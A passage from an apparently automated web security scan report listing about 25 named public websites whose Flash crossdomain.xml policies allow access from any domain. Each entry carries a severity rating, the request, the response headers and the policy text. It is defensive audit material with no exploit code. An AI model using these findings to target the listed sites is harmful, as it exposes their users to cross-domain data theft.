Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instructables.com

Response

HTTP/1.1 200 OK
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
ETag: "DV9F16DWcqJ"
Last-Modified: Sat, 15 Jan 2011 00:26:28 GMT
Content-Type: text/xml
Content-Length: 201
X-Cacheable: YES - 30 minutes
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:36:03 GMT
X-Varnish: 4054888881 4054848118
Age: 408
Via: 1.1 varnish
X-Cache-Svr: squid02.instructables.com
X-Cache: HIT
X-Cache-Hits: 18
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.77. http://www.instyle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instyle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.instyle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:57 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.78. http://www.intellicast.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellicast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intellicast.com

Response

HTTP/1.1 200 OK
Content-Length: 136
Content-Type: text/xml
Content-Location: http://www.intellicast.com/crossdomain.xml
Last-Modified: Mon, 15 Feb 2010 17:02:22 GMT
Accept-Ranges: bytes
ETag: "e4451aa460aeca1:30d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:22 GMT
Connection: close
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=ffffffff094a140b45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:26:25 GMT;path=/;httponly

...<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" secure = "true"/>
</cross-domain-policy>

7.79. http://www.kaboodle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kaboodle.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
ETag: W/"200-1301007108000"
Last-Modified: Thu, 24 Mar 2011 22:51:48 GMT
Content-Type: application/xml
Content-Length: 200
Date: Sat, 02 Apr 2011 13:30:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.80. http://www.like.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.like.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.like.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Jan 2010 18:02:03 GMT
X-Like-Servetime: Servetime: D=603
Content-Type: application/xml
Vary: User-Agent
Date: Sat, 02 Apr 2011 13:55:28 GMT
Content-Length: 360
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.81. http://www.liveleak.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.liveleak.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.liveleak.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:09 GMT
Server: Apache
Last-Modified: Wed, 20 Aug 2008 11:50:42 GMT
ETag: "50284d-cd-48ac0512"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.82. http://www.manualsonline.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manualsonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.manualsonline.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache/2.2.14 (Fedora)
Last-Modified: Wed, 26 Jan 2011 14:52:42 GMT
ETag: "d746c4-ef-49ac0fc2c4280"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" heade
...[SNIP]...

7.83. http://www.mapquest.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="oMxvAHE6AVKXbBWonwSpcUH2bX4="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:31 GMT; Path=/
Set-Cookie: psession="XYhsFEjJgX/0tbwu99Px6nQHTiA="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:31 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: application/xml
Content-Length: 209
Date: Sat, 02 Apr 2011 12:37:31 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...

7.84. http://www.marthastewart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marthastewart.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 Mar 2009 21:36:48 GMT
ETag: "fcbe29-c0-d951fc00"
Accept-Ranges: bytes
Content-Length: 192
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:34:19 GMT
Connection: close

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.85. http://www.mate1.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mate1.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mate1.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:37 GMT
Server: Apache
Set-Cookie: DATESESS=fbd31cc9c09d8951; domain=.mate1.com; path=/
P3P: policyref="http://www.mate1.com/p3p/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Cache-Control: max-age=0, private
Expires: Sat, 02 Apr 2011 13:56:37 GMT
Content-Length: 267
Content-Type: application/xml
X-Cache: MISS from crtv4.mate1.com
Via: 1.1 crtv4.mate1.com:80 (squid/2.7.STABLE7)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" to-ports="*" />
...[SNIP]...

7.86. http://www.menshealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.menshealth.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Jan 2008 12:17:58 GMT
ETag: "c9-62610980"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:36:12 GMT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.87. http://www.metacafe.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "17f18a6-d0-49d966e98b740"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:23:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.88. http://www.metrolyrics.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metrolyrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metrolyrics.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: "c4-4c72c0fe-0"
Last-Modified: Mon, 23 Aug 2010 18:42:06 GMT
Content-Type: application/xml
Content-Length: 196
Date: Sat, 02 Apr 2011 13:25:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.89. http://www.minorleaguebaseball.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.minorleaguebaseball.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.minorleaguebaseball.com

Response

HTTP/1.0 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:37:49 GMT
Content-Type: text/xml
Content-Length: 80
Cache-Control: max-age=60
Edge-control: max-age=60
Last-Modified: Mon, 16 May 2005 18:12:09 GMT
ETag: "50-4288e279"
Accept-Ranges: bytes
Age: 47
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6)
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.90. http://www.mlb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mlb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mlb.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 18 Jan 2011 20:14:01 GMT
Content-Length: 428
Accept-Ranges: bytes
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:24:42 GMT
Cache-Control: max-age=60
Edge-control: max-age=60
ETag: "1ac-4d35f489"
Age: 25
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6)
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-access-from domain="*.mlb.com" secure="false" />
   <allow-http-request-headers-from domain="*.mlb.com" headers="*" secure="false"/>
   <site
...[SNIP]...

7.91. http://www.mmo-champion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmo-champion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmo-champion.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Nov 2010 22:26:07 GMT
Content-Length: 332
Date: Sat, 02 Apr 2011 13:46:14 GMT
Connection: close
X-Cache-Hits: -1
X-URL: /crossdomain.xml
X-Backend: phpservers2
X-Req: 455438597
X-Language: en

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.92. http://www.mtv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 12:43:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...

7.93. http://www.myrecipes.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myrecipes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myrecipes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache
Last-Modified: Tue, 05 Oct 2010 18:26:00 GMT
ETag: "b13f7-d9-491e2caecde00"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: application/xml
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cros
...[SNIP]...

7.94. http://www.ncm.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ncm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ncm.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 13:00:36 GMT
Accept-Ranges: bytes
ETag: "072eca1eceacb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:56 GMT
Connection: close
Content-Length: 897

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="tst.ncmsocial.com"/>
<allow-access-from domain="localhost.ncmsocial.com"/>
<allow-access-from domain="dev.ncmsocial.com"/>
<allow-access-from domain="ncmsocial.com"/>
<allow-access-from domain="www.ncmsocial.com"/>
<allow-access-from domain="www.totaleclips.com"/>
<allow-access-from domain="totaleclips.com"/>
<allow-access-from domain="edgesuite.net"/>
<allow-access-from domain="progressive.totaleclips.com.edgesuite.net"/>
<allow-access-from domain="www.fathomevents.com"/>
<allow-access-from domain="www.movienightout.com"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.95. http://www.newser.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newser.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newser.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Sun, 29 Mar 2020 00:00:00 GMT
Last-Modified: Sun, 01 Feb 2009 20:47:39 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:03:49 GMT
Connection: close
Content-Length: 324

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.96. http://www.newsok.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsok.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsok.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Jun 2010 19:32:53 GMT
ETag: "1bd06e-106-48a304daba340"
Accept-Ranges: bytes
Content-Type: text/xml
Connection: close
Date: Sat, 02 Apr 2011 12:52:35 GMT
Age: 556
Content-Length: 262

<?xml version="1.0"?>
<!-- http://static.newsok.biz/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="newsok..com" />
<allow-access-from domain="*.newsok..com" />
<allow-access-from domain="*" />
...[SNIP]...

7.97. http://www.nickjr.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nickjr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nickjr.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 864
Content-Type: text/xml
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:20 GMT; path=/
ETag: W/"864-1301149306000"
Vary: User-Agent
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 13:31:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="*.nickjr.com" />
   <allow-access-from domain="*.nickjr-d.mtvi.com" />
   <allow-access-from domain="*.nickjr-q.mtvi.com" />
   <allow-access-from domain="*.nick.com" />
   <allow-access-from domain="*.nick-d.mtvi.com" />
   <allow-access-from domain="*.nick-q.mtvi.com" />
   <allow-access-from domain="*.mtvi.com" />
   <allow-access-from domain="*.dimetapp.com" />
   <allow-access-from domain="*.mtvnservices.com"/>
   <allow-access-from domain="*.tween.as" />
...[SNIP]...

7.98. http://www.nola.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nola.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 324
Content-Type: text/xml
ETag: "71686e-144-47185a180bb40"
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
ntCoent-Length: 324
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:37:08 GMT
Date: Sat, 02 Apr 2011 13:37:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.99. http://www.nydailynews.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nydailynews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:38 GMT
Server: Apache
Last-Modified: Fri, 14 Sep 2007 15:01:08 GMT
Accept-Ranges: bytes
Content-Length: 200
Keep-Alive: timeout=3, max=999
Content-Type: application/xml
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:23:19 GMT; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.100. http://www.oodle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oodle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Last-Modified: Wed, 12 Mar 2008 00:55:41 GMT
ETag: "11c80ff-ca-44832e564dd40"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Length: 202
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.101. http://www.openforum.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.openforum.com

Response

HTTP/1.0 200 OK
Content-Length: 390
Content-Type: text/xml
Last-Modified: Tue, 22 Mar 2011 14:34:04 GMT
Accept-Ranges: bytes
ETag: "1CBE89E31501600"
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: public, max-age=65014
Expires: Sun, 03 Apr 2011 07:43:08 GMT
Date: Sat, 02 Apr 2011 13:39:34 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

